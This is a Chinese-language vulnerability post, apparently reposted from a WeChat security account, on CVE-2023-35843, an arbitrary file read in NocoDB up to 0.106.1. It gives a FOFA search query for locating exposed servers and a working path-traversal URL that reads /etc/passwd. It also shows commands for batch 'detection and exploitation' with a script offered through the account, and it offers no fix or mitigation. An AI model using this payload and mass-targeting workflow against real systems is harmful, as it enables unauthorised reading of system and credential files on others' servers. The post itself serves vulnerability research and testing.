免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

NocoDB 是 Airtable 的开源替代方案，可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

二、影响范围

NocoDB<=0.106.1

三、网络空间搜索引擎搜索

fofa查询

icon_hash="-2017596142"

四、漏洞复现

poc

http://ip:port/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

浏览器直接访问

五、漏洞批量检测与利用

单个检测

python .NocoDBReadfile.py -u http://ip:port

批量检测与利用

python .NocoDBReadfile.py -f  filename

注： 无法访问不一定漏洞不存在，由于网络问题，国外网站无法访问，也会导致无法访问的现象

关注微信公众号 网络安全透视镜 回复 20231008-2 获取批量检测脚本

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

原文始发于微信公众号（网络安全透视镜）：【CVE-2023-35843】NocoDB 任意文件读取漏洞